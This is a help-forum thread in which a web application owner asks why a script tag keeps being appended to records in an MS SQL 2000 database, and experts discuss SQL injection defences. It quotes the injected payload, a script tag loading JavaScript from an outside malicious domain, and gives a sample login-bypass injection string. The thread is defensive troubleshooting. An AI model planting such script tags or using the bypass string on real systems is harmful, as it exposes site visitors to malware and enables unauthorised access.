Want to protect your cyber security and still get fast solutions? Ask a secure question today.Go Premium

x
?
Solved

SQL Injection

Posted on 2010-01-04
21
Medium Priority
?
462 Views
Last Modified: 2012-05-08
I am having a problem with my database, somehow somone is altering the data in my database, i talked to the IT staff and they say it might be an SQL injection. It alters all the records in one table adding some junk code, like:

so if the value before was 'aleks', after the injection it is 'aleks<script src=http://www.bnrupdate.mobi/b.js></script>'

Have you seen this before ?  Sometimes its code from google analytics, etc.  It is driving me crazy not to mention a security risk.  how can I track down when and who is doing this and how to prevent this from happening again ?

This is a web application with limited users, everything (web forms, etc) is behind a username/password protected area. nothing is open to the public. I am using MS SQL 2000.

Any pointers are appreciated, this is a big concern for me at this moment. And I am willing to pretty much try everything that could help. But if there is a way to get the person doing this i am willing to setup a 'trap' to get his IP or whatever.

Aleks
0
Comment
Question by:Aleks
  • 9
  • 3
  • 2
  • +5
21 Comments
 
LVL 5

Accepted Solution

by:
sureshchsahu earned 184 total points
ID: 26177837
The below article gives you a clear picture how to prevent from SQL Injection

http://www.codeproject.com/KB/database/SqlInjectionAttacks.aspx
0
 

Author Comment

by:Aleks
ID: 26177954
Ok, so if we talk about not allowing certain charachters to be inputed into the system the aphostrophe '  would be at the top of the list, because the queries that are run require such character. correct ?
Any other character that would be a big no no ?
0
 
LVL 25

Assisted Solution

by:madunix
madunix earned 364 total points
ID: 26178796
FYI, sql injection is top rated web Application attack these days. There are many insecure code over the net and also there are several ways to protect ASP.NET application from sql injection attacks. sql injection can occur when an application uses input to construct dynamic sql statements or when it uses stored procedures to connect to the database. Methods of sql injection exploitation are classified according to the DBMS type and exploitation conditions  Vulnerable request can implement Insert, update, delete. It is possible to inject sql code into any part of sql request Blind sql injection Features of sql implementations used in various dbms. Successful sql injection attacks enable attackers to execute commands in an application's database and also take over the server. check google more how to protect against sql injection
regarding Microsoft issue check http://msdn.microsoft.com/en-us/library/ms998271.aspx
search http://www.sans.org/  "sql injection"
WASC: http://projects.webappsec.org/SQL-Injection
OWASP: http://www.owasp.org/index.php/SQL_Injection

madunix

0
What is SQL Server and how does it work?

The purpose of this paper is to provide you background on SQL Server. It’s your self-study guide for learning fundamentals. It includes both the history of SQL and its technical basics. Concepts and definitions will form the solid foundation of your future DBA expertise.

 
LVL 12

Assisted Solution

by:R_Harrison
R_Harrison earned 364 total points
ID: 26178878
Also check out the below article (shameless self promotion) - however XSS is now far more popular then SQL injection and the attack you have received uses SQL Injection to perform an XSS type attack.

http://www.experts-exchange.com/articles/Internet/Web_Development/Preventing-Cross-Site-Scripting-XSS-1.html?sfQueryTermInfo=1+30+xss
0
 
LVL 28

Assisted Solution

by:sybe
sybe earned 544 total points
ID: 26178993
> nothing is open to the public

You mean there is not even a "public" part, viewable to non-logged users? If so, it looks you have an easily hacked login form.

Preventing SQL Injection is simple by making sure that all apostrophs in an SQL statement are escaped before sending them to the database.

<%
Replace(userinput, "'", "''")
%>

Hacking a login form when there is no check for SQL Injection is easy by inserting something like "x' OR 'a' = 'a" (without the double quotes) into the password field.

It results in an SQL statement as

SELECT * FROM <users> WHERE <name>='loginname' AND password='x' OR 'a' = 'a'

Because 'a' = 'a' is True for all records, this query will return all users.





0
 
LVL 75

Assisted Solution

by:Anthony Perkins
Anthony Perkins earned 184 total points
ID: 26180306
>>nothing is open to the public. I am using MS SQL 2000. <<
So MS SQL Server is behind a good firewall?

0
 

Author Comment

by:Aleks
ID: 26180716
So, for them to do this do they need to type ' (quotes) in the password field ?

If I don't allow such character in ANY field in my entire system, would this prevent future injections ?
0
 
LVL 28

Assisted Solution

by:sybe
sybe earned 544 total points
ID: 26180853
Not allowing the apostroph has some disadvantages, because it is a character that has its use.
Better escape the apostroph then disallow the apostroph (in terms of code that makes no difference).
0
 

Author Comment

by:Aleks
ID: 26180962
What do you mean 'escape'   ?
0
 
LVL 12

Assisted Solution

by:R_Harrison
R_Harrison earned 364 total points
ID: 26181024
Basically replace a single apostrophe with 2 apostrophies...

e.g  replace(username, "'", "''")

so your sql line might look something like...

SELECT * FROM mytable WHERE Username='" & replace(request("Username"), "'", "''") & "'
0
 

Author Comment

by:Aleks
ID: 26181141
Ok, let me get this straight.
1. I am being attacked by someone entering code in the fields where for example username or password should be?
2. If I dont allow apostrophe or replace it in either field they should no longer be able to enter the code to attack me. Correct ?
0
 
LVL 28

Assisted Solution

by:sybe
sybe earned 544 total points
ID: 26181204
1. It is not sure how you are being attacked, but it is possible that it happens this way.
2. SQL-injection can be prevented in a number of ways. Most used are parameterized queries, stored procedures or escaping (indeed  replace every sinmgle apostroph from user-input with two apostrophs) are the most used method. Disallowing apostrophs as user input is not a widely used method.
0
 
LVL 32

Assisted Solution

by:Daniel Wilson
Daniel Wilson earned 180 total points
ID: 26181618
>> Disallowing apostrophs as user input is not a widely used method.

Right.  Mr. O'Brian strongly disapproves of such an approach :)

I highly encourage parameterized queries.  Others like escaping ... and some say to do both.
0
 

Author Comment

by:Aleks
ID: 26183680
This is the query for my login page, which is the only form outside of the password protected area.

<%
var EmployeeLogin__usxusername = "%";
if (String(Request.Form("txtusername")) != "undefined" && 
    String(Request.Form("txtusername")) != "") {
  EmployeeLogin__usxusername = String(Request.Form("txtusername"));
}
%>
<%
var EmployeeLogin__usxpassword = "%";
if (String(Request.Form("txtpassword")) != "undefined" && 
    String(Request.Form("txtpassword")) != "") {
  EmployeeLogin__usxpassword = String(Request.Form("txtpassword"));
}
%>
<%
var EmployeeLogin = Server.CreateObject("ADODB.Recordset");
EmployeeLogin.ActiveConnection = MM_AAA_STRING;
EmployeeLogin.Source = "select * from dbo.vulogdtls   WHERE Loginid = '"+ EmployeeLogin__usxusername.replace(/'/g, "''") + "' AND Password = '"+ EmployeeLogin__usxpassword.replace(/'/g, "''") + "'  AND Enable = 1 AND (ExpDate >= getdate() OR ExpDate IS NULL)";
EmployeeLogin.CursorType = 0;
EmployeeLogin.CursorLocation = 2;
EmployeeLogin.LockType = 1;
EmployeeLogin.Open();
var EmployeeLogin_numRows = 0;
%>

Would that query have any problem and be potentially unsafe ?   Or is it OK. !

I can't seem to find anythign that is causing data to be inputed into my database, this is really becoming a very stressful experience.
Are there any specific recommendations that anyone can make ?  I know reading articles helps but wont be something that will immediately and possibly stop the attacks. For example: Change your IP would be a good recommendation.
I heard that from someone, do you think this would help ?
Are there other specific recommendations you could offer to help prevent attacks ?

How about if its not from the outside but a file or script already in the server, is this a possibility ?   or content in the database that resides there and adds the data .. is this another possibility ?

A
0
 

Author Comment

by:Aleks
ID: 26184198
Also, is there a possibility this is not an sql injection and instead some malicious script already residing in the server ?  if this is the case, what would be the best course of action ?
Or is there a chance the script is inside the database ?
0
 
LVL 25

Assisted Solution

by:madunix
madunix earned 364 total points
ID: 26184665
my recommendation:
- Basically, make sure your web server is up-to-date with latest security fixes/patches.
- Make sure you have filter every user input and output as proper encoding like UTF-8.
Read the full testing guide: https://www.owasp.org/images/8/89/OWASP_Testing_Guide_V3.pdf
- try tom imlement web application scanner , check this link http://trac.ush.it/ush/wiki/SecurityTools
- i use ex. watchfile now IBM aapscan tools http://www-01.ibm.com/software/rational/offerings/websecurity/  to scan all my web application
0
 

Author Comment

by:Aleks
ID: 26186160
Thank you, this is very useful. I will look into this tools.

Aleks
0
 

Author Comment

by:Aleks
ID: 26195931
I am sorry its taken long for me to respond but I have been busy learning and implementing the sql fixes.
The thing is last night i stopped my website from IIS. no web access. I cleaned up my database skeeque clean ... midnight ... went to sleep. Woke up and checked my database .. all injected, same code all over different tables (Same tables) and mostly on 'text' fields.
So .. how could someone inject information into my database while the website is down, my understanding is that they do it through the web pages by entering code and submitting the form to run it, if there is no form how in the world did my database got this code ?

I checked for viruses and adware/malware ... nothing in the server. It is sql 2000 with service pack 4 and all patched up to the neck .. dont know what else to do.

My DB person told me to run profiler on the sql so we can see what happens overnight.  Any other ideas ?  it would sound like a worm that is in the database, but then again i know nothing about this things, i am losing my faith and my whole business depends on this database :(
0
 

Author Comment

by:Aleks
ID: 26195937
BTW. I already changed all server passwords, database passwords, ODBC passwords, I assigned a new IP, a new domain name ... and still got the code inserted into my database, all while the website that connects to the database was down.
0
 
LVL 25

Assisted Solution

by:kevp75
kevp75 earned 180 total points
ID: 26273207
better still would be to use parameterized queiries with ado.command object.

force all the data types before they get to your query

also, start cleaning your input...  I suggest some regular expressions to validate everything
0
 
LVL 75

Expert Comment

by:Anthony Perkins
ID: 26275853
>>better still would be to use parameterized queiries <<
Very good advice.  :)
0

Featured Post

Free Tool: Port Scanner

Check which ports are open to the outside world. Helps make sure that your firewall rules are working as intended.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Dramatic changes are revolutionizing how we build and use technology. Every company is automating, digitizing, and modernizing operations. We need a better, more connected way to work together as teams so we can harness the insights from our system…
Without even knowing it, most of us are using web applications on a daily basis.  In fact, Gmail and Yahoo email, Twitter, Facebook, and eBay are used by most of us daily—and they are web applications. We generally confuse these web applications to…
This tutorial walks through the best practices in adding a local business to Google Maps including how to properly search for duplicates, marker placement, and inputing business details. Login to your Google Account, then search for "Google Mapmaker…
The viewer will get a basic understanding of what section 508 compliance can entail, learn about skip navigation links, alt text, transcripts, and font size controls.

581 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question